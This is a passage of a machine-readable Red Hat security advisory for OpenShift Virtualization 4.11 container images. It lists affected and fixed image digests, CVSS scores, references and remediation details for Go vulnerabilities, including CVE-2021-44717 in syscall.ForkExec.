"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: net/http: limit growth of header canonicalization cache"
},
{
"cve": "CVE-2021-44717",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2021-12-09T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030806"
}
],
"notes": [
{
"category": "description",
"text": "There\u0027s a flaw in golang\u0027s syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: syscall: don\u0027t close fd 0 on ForkExec error",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw\u0027s impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44717"
},
{
"category": "external",
"summary": "RHBZ#2030806",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030806"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44717",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44717"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44717",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44717"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k",
"url": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k"
}
],
"release_date": "2021-12-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
},
{
"category": "workaround",
"details": "This bug can be mitigated by raising the per-process file descriptor limit.",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
